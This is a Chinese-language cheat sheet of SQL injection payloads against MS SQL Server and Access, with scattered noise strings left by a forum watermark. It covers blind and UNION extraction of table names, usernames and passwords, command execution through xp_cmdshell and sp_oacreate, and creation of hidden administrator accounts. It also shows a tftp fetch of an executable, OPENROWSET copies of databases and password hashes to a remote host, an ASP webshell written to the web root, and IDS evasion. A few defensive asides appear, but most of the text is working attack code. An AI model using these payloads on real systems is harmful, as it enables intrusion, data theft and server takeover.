1. 判断有无注入点
( N- Y7 J4 v* H r% }; and 1=1 and 1=2 ; b$ \8 G; F+ `% N: n4 ^# m P
2. 猜表:一般的表名无非是 admin、adminuser、user、pass、password 等。
/ y- D2 J) }6 I" [and 0<>(select count(*) from *)
! c1 x" z* t0 a+ m: W3 kand 0<>(select count(*) from admin) ---判断是否存在admin这张表
3. 猜帐号数目:如果 0< 返回正确页面,而 1< 返回错误页面,说明帐号数目就是 1 个。
and 0<(select count(*) from admin) 4 {1 t$ J" L. m$ ]
and 1<(select count(*) from admin)
$ o6 o1 T0 M- i3 r$ o1 T猜列名还有 and (select count(列名) from 表名)>0
4. 猜解字段名称:在 len( ) 括号里面加上我们想到的字段名称。
: S; l9 I6 g( b7 X7 r4 M' Sand 1=(select count(*) from admin where len(*)>0)-- # R& f; m% S7 s+ ]$ L+ d c0 x
and 1=(select count(*) from admin where len(用户字段名称name)>0)
% S1 M2 O' L6 z. K# Hand 1=(select count(*) from admin where len(密码字段名称password)>0) 5 M g2 }9 H2 H$ Z Y: v* t
5. 猜解各个字段的长度:猜解长度就是把 >0 变换,直到返回正确页面为止。
and 1=(select count(*) from admin where len(*)>0)
( B# e, [% Q) v& G( k/ _' cand 1=(select count(*) from admin where len(name)>6) 错误
7 t3 Q' y1 k, e) u2 p: y) |9 aand 1=(select count(*) from admin where len(name)>5) 正确 长度是6 : A/ z& B5 s$ @' L0 l7 Y
and 1=(select count(*) from admin where len(name)=6) 正确
and 1=(select count(*) from admin where len(password)>11) 正确
# r% _0 w3 K6 U) W4 A: \" \7 M5 s8 [and 1=(select count(*) from admin where len(password)>12) 错误 长度是12 ( g2 m! _6 Q7 x; J1 O
and 1=(select count(*) from admin where len(password)=12) 正确 . [/ S9 B j# g! \# a# p
猜长度还有 and (select top 1 len(username) from admin)>5- k0 k7 z$ Z) S4 m# l, s7 ?
6. 猜解字符
and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位 , |2 B, F1 v8 E$ N! t
and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位
就这样一次加一个字符地猜,猜到够你刚才猜出来的位数就对了,帐号就算出来了。
猜内容还有 and (select top 1 asc(mid(password,1,1)) from admin)>50 用ASC码算' s% { R: N4 U
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- 7 `& B6 F# U1 O0 O5 `
这个查询语句可以猜解中文的用户和密码。只要把后面的数字换成中文的 ASCII 码就可以,最后把结果再转换成字符。
, e7 ~* b# j2 K3 k2 P; R+ P' dgroup by users.id having 1=1--
' w* y$ q- G Q/ Pgroup by users.id, users.username, users.password, users.privs having 1=1-- ( e) f- P1 h: V2 x) e# e& e
; insert into users values( 666, attacker, foobar, 0xffff )--
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable-
; i0 X% z+ s. {2 b0 R }UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)- 1 J5 e; @1 z, H- c& \
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)- - E" u6 s& a! d3 _7 v
UNION SELECT TOP 1 login_name FROM logintable- 1 A6 t. D* \$ y8 s3 x) L# i; H6 T7 \5 B
UNION SELECT TOP 1 password FROM logintable where login_name=Rahul--
看服务器打的补丁:出错了说明打了 SP4 补丁。
and 1=(select @@VERSION)--
看数据库连接账号的权限:返回正常,证明是服务器角色 sysadmin 权限。(应用程序用 sysadmin 帐号连接数据库,是本页后面多数操作的前提;按最小权限原则,应为应用单独建立低权限登录。)
and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))-- $ \8 v1 L* L* q: \
判断连接数据库帐号:(采用 SA 账号连接,返回正常 = 证明了连接账号是 SA)
and sa=(SELECT System_user)-- 0 f. H* c( L+ \8 K7 Y( `2 P: m
and user_name()=dbo--
3 f8 j: E& c8 e. U+ {and 0<>(select user_name()--
看 xp_cmdshell 是否删除(SQL Server 2005 及以后版本默认禁用 xp_cmdshell,由 sp_configure 选项控制;下面用 sp_addextendedproc 恢复它需要 sysadmin 权限,审计时应确认该选项保持关闭)
/ C, d. {% C3 Gand 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)-- ! j4 G+ [' C# y! E8 i
" v* d5 f9 g' S. k+ axp_cmdshell被删除,恢复,支持绝对路径的恢复
, R; Y" ^8 R9 P- S& f1 U;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--
3 c1 r0 ^6 S* @& c. x;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll-- ' J8 ?. \6 b. m$ W8 X3 t
反向PING自己实验
1 l: W( a5 v" ? V2 Q/ I;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--
加帐号
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add--
创建一个虚拟目录E盘:
2 [# w5 _8 f' B7 Y+ ]9 c8 e;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"-- ) }, h5 Q$ u+ v7 E2 S& H
访问属性:(配合写入一个 webshell)
declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse
MSSQL 也可以用联合查询
: `3 D3 M/ X1 a( c$ l2 ~?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin / ^6 Y0 R5 S# e- x6 n3 Q( w4 O
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用)
: `% x w+ X7 T0 P, s/ A$ ]爆库 特殊技巧:%5c=\ 或者把/和\ 修改%5提交 ' X( Q' h# l+ K! l6 L$ j
得到 WEB 路径
;create table [dbo].[swap] ([swappass][char](255));-- # w0 ~ A3 h, a9 H& N
and (select top 1 swappass from swap)=1-- 1 O( H9 U$ a6 k0 g) h! X" w0 J
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)-- / _( `1 t' @# \
;use ku1;-- i$ W+ k8 d# q1 j- A. R) A
;create table cmd (str image);-- 建立image类型的表cmd
存在 xp_cmdshell 的测试过程:
;exec master..xp_cmdshell dir . S$ u0 p2 f3 }
;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号
$ @% w! Z6 E- w;exec master.dbo.sp_password null,jiaoniang$,1866574;--
/ ]3 x4 ~; s8 ?0 R;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;-- 8 E1 R( w' B$ c/ I4 G8 p/ i' I j" s. ?
;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;--
7 Q8 f$ g# R4 _0 `- q. H;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;--
( _9 F: K8 S" Y2 S) pexec master..xp_servicecontrol start, schedule 启动服务 1 S3 X5 Z! v9 b# F/ s% [
exec master..xp_servicecontrol start, server 2 [6 w% ^4 @! G( z1 D4 S; W+ H$ J
; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add
: ^9 b, r0 B& W0 R0 R9 j4 W;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add ) I* `$ L6 E8 S# j* P( O; m" X
; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件 $ q% N# _) x( y% j+ z7 Y
+ u+ h, u- l3 S& j;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\ . T2 Y. z% A. G$ }
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
9 P& e2 b2 q# \;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat 5 I- V6 U+ z2 b# `
如果被限制则可以。
7 e2 a; L$ W, Iselect * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax) $ I# U' h( P: {. D: D
查询构造:
: N5 m; h4 j2 }) RSELECT * FROM news WHERE id=... AND topic=... AND ..... 5 k. |9 ?- z/ y# Z2 w# _4 y2 [
adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <> 8 k1 T0 V+ `5 B! V$ _1 [4 X9 n) Y4 s
select 123;--
; t1 O* F6 K2 B g9 q5 p6 Y! ];use master;--
0 Z* O8 R- C7 R9 l:a or name like fff%;-- 显示有一个叫ffff的用户哈。
( x$ U) I9 S+ {* r. ~and 1<>(select count(email) from [user]);-- % u6 B' w9 H" z7 ~
;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;--
& ]0 _4 |' s# E$ K1 f;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;-- . f2 f7 Q4 R. c5 g
;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;--
5 d/ Z8 _3 }9 F7 n' w;update [users] set email=(select top 1 count(id) from password) where name=ffff;--
( Z5 B/ R0 l9 J1 z# O+ P;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--
: b. g9 Z& ]( w1 Z2 i4 Z8 [2 g* c0 D0 q( ~;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--
上面的语句是得到数据库中的第一个用户表,并把表名放在 ffff 用户的邮箱字段中。
通过查看 ffff 的用户资料可得第一个用户表叫 ad。
然后根据表名 ad 得到这个表的 ID,再得到第二个表的名字。
insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-- & W7 i, C g; X, D, m
insert into users values( 667,123,123,0xffff)-- : i, {% y& L6 y1 v
insert into users values ( 123, admin--, password, 0xffff)-- ; T' A. N& n7 e9 P# u
;and user>0
" b+ H6 s7 U& p/ y- X;and (select count(*) from sysobjects)>0 3 X2 E1 x/ A+ X
;and (select count(*) from mysysobjects)>0 //为access数据库
枚举出数据表名
. f6 `6 D! w& V7 i/ A; L;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);--
" Z. l) d! J6 d% s. h4 D2 w这是将第一个表名更新到aaa的字段处。
读出第一个表后,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);--
5 f# l; R0 _0 q! c& F7 Z然后id=1552 and exists(select * from aaa where aaa>5) 7 e& X, f& g: s7 g. w
读出第二个表,一个个地读出,直到没有为止。
读字段是这样:
;update aaa set aaa=(select top 1 col_name(object_id(表名),1));--
) F1 c5 O6 g$ _' K: l然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
+ s3 F e" r, X( Y( p9 s8 ^. H( |;update aaa set aaa=(select top 1 col_name(object_id(表名),2));--
6 s+ E6 g0 P% S4 e( m然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名 " o" c2 E4 u I2 l& k
[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
C5 c6 M( N0 j& e; M, Supdate 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…)
通过 SQL Server 注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是 SYSADMIN 组]
[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
1 z( i& U. }9 w( }% _3 Lupdate 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件] . R& X$ n5 J( u3 s/ h
绕过 IDS 的检测[使用变量](检测侧应以服务器端审计中实际执行的存储过程名为准,而不是对请求文本做关键字匹配,否则会被这种变量拼接方式绕过)
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
. a1 I7 I" ]0 Y. `0 v;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\ & p/ V; x; D% ~9 D2 W
1、 开启远程数据库
基本语法
3 i$ o1 Q( y* }" l+ f/ a- Yselect * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 ) : \3 U6 z1 N6 B: ~) M* j
参数:(1) OLEDB Provider name
2、 其中连接字符串参数可以是任何端口用来连接,比如
' {# j8 k8 w( S! w9 J$ Qselect * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table
3. 复制目标主机的整个数据库:insert 所有远程表到本地表。
基本语法:
. l$ W' P; }) M7 e- Uinsert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2 " P: W5 t6 F. Y% ^
这行语句将目标主机上 table2 表中的所有数据复制到远程数据库中的 table1 表中(这会让数据库服务器主动向外部地址发起 1433 连接;防御上应限制数据库服务器的出站连接,并确认 'Ad Hoc Distributed Queries' 选项处于关闭状态)。实际运用中适当修改连接字符串的 IP 地址和端口,指向需要的地方,比如:
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2 : x! j" O+ U( M4 S1 i
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases)
+ @1 I* C& z3 Y$ Zselect * from master.dbo.sysdatabases
8 [2 p5 x/ m2 Binsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects)
; Y! k* f" m. pselect * from user_database.dbo.sysobjects % Y5 C& @8 S+ N3 w N% e6 G4 C
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns) 9 `) l0 h. ~9 M7 S' y2 X& U
select * from user_database.dbo.syscolumns ! G9 q8 z% q# R) B$ u
复制数据库:
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1 2 A' i0 X& ]1 d, ]
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2
复制哈希表(HASH):登录密码的 hash 存储于 sysxlogins 中。方法如下:
9 e- w9 t7 U' F/ H* j6 finsert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select * from database.dbo.sysxlogins 5 H2 z* d0 b4 V4 }% a g
得到hash之后,就可以进行暴力破解。 ( G- U- a; k! s& L& w7 P7 c
遍历目录的方法:先创建一个临时表 temp
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ( N- P) A }7 V# ] ^/ l; b
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 $ j5 ]' N9 F, ^$ ? T9 r
;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表
I* Z" e: }# Z$ Z% ?8 g0 F' [0 w;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中
+ s8 `. y" ^( m1 R6 S9 I2 Y;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个文件的内容
7 e+ x5 a& P0 {4 P2 B8 Y$ u1 {;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;--
9 n: C, R- K2 ~ o;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;--
& O+ o( E( q; R" J% {;insert into temp(id) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc 1 [& s8 u# w+ @2 E! ^
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- (xp_dirtree适用权限PUBLIC)
写入表:
语句1:and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--
, {- ?5 N) |. M0 i+ @7 y语句2:and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));-- " p: u. W; G- i5 D" E; T: E
语句3:and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
' v+ D$ C, U0 d: {语句4:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
+ J. x6 a Z# V; A2 h1 _# l语句5:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));-- 1 L5 V' n* ?9 |% ]# c8 @
语句6:and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));-- ( p7 I1 d* {* f2 \
语句7:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
- ?; O" M2 n. B" C' X语句8:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));-- . ?0 B% r, B3 M7 m$ O
语句9:and 1=(SELECT IS_MEMBER(db_owner));--
把路径写到表中去:
& C, i {6 Q5 i; O6 D9 ^: ]0 |;create table dirs(paths varchar(100), id int)--
+ {& S! d0 {$ ?4 e5 N3 g;insert dirs exec master.dbo.xp_dirtree c:\-- : j5 R: f$ e( K; b$ k; E
and 0<>(select top 1 paths from dirs)-- # h# {, z! h! P
and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))--
' ^% \7 V% V2 b1 D) V;create table dirs1(paths varchar(100), id int)-- 8 `: R' F/ t; E. s9 N
;insert dirs exec master.dbo.xp_dirtree e:\web--
* n4 v# k, j4 P9 k8 Uand 0<>(select top 1 paths from dirs1)--
把数据库备份到网页目录:下载
;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;--
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
5 t; c+ @5 b3 [+ X4 jand 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。
6 x- h( w% |* W9 f6 cand 1=(select user_id from USER_LOGIN) & O4 b4 P( _8 F/ m2 K( h
and 0=(select user from USER_LOGIN where user>1) ) ^0 l9 w8 S. r6 @
-=- wscript.shell example -=-
3 n& ~: m# c6 X. X0 Jdeclare @o int
+ O1 \( w& D0 U7 P6 J5 K9 Texec sp_oacreate wscript.shell, @o out 7 h1 w8 ^) s$ g. y( ~9 {
exec sp_oamethod @o, run, NULL, notepad.exe
" k( ?0 W. {1 H; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe--
declare @o int, @f int, @t int, @ret int
. N" \( m& W6 n% b5 F+ ^/ sdeclare @line varchar(8000) : |8 H. |& l- n5 n! h# i
exec sp_oacreate scripting.filesystemobject, @o out 0 I5 y% c% g8 e) P7 X$ i: O. Z
exec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1 1 K1 a1 N; @8 W2 _0 h% E
exec @ret = sp_oamethod @f, readline, @line out
# ~. Z3 R: v v4 o1 K9 ]while( @ret = 0 ) 5 u2 I8 Z" C7 Q) Q# [6 _
begin 3 W# g, f6 Z! s9 z7 |1 s! s
print @line 4 H: k" z9 I) x. |
exec @ret = sp_oamethod @f, readline, @line out , e) T! S, T; q) {: ?& I6 x
end & ^* I i1 ^" a, X
declare @o int, @f int, @t int, @ret int
' a+ G0 _8 `' ]2 p* k+ iexec sp_oacreate scripting.filesystemobject, @o out
) C: x6 j0 y4 r& ^) D/ ~/ ^4 Gexec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1
5 G* M& a: S+ ]exec @ret = sp_oamethod @f, writeline, NULL, % L' a# y* W2 |# W+ M
<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>
3 n s8 v% n& Z) t, b {; T6 D+ tdeclare @o int, @ret int , k8 j. `3 S3 i- a. f
exec sp_oacreate speech.voicetext, @o out
. g$ Q: i7 o! |8 G7 b( B% Texec sp_oamethod @o, register, NULL, foo, bar
. _ Z. }* }9 l( {" R) o# S4 T( Wexec sp_oasetproperty @o, speed, 150 m6 v& W( @2 P$ Y
exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528
) X+ X B5 V9 F/ L. K1 [9 F0 ywaitfor delay 00:00:05 - v7 j( ^$ o$ ]' v3 N/ ]8 O: r0 {
; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05--
xp_dirtree 适用权限 PUBLIC
exec master.dbo.xp_dirtree c: 返回的信息有两个字段:subdirectory、depth。subdirectory 字段是字符型,depth 字段是整型字段。
create table dirs(paths varchar(100), id int) 3 J1 I7 n) {# @
建表,这里建的表是和上面 xp_dirtree 相关联的,字段相等、类型相同。
insert dirs exec master.dbo.xp_dirtree c: 只要我们建的表与存储过程返回的字段定义相等就能够执行,达到写表的效果,一步步得到我们想要的信息。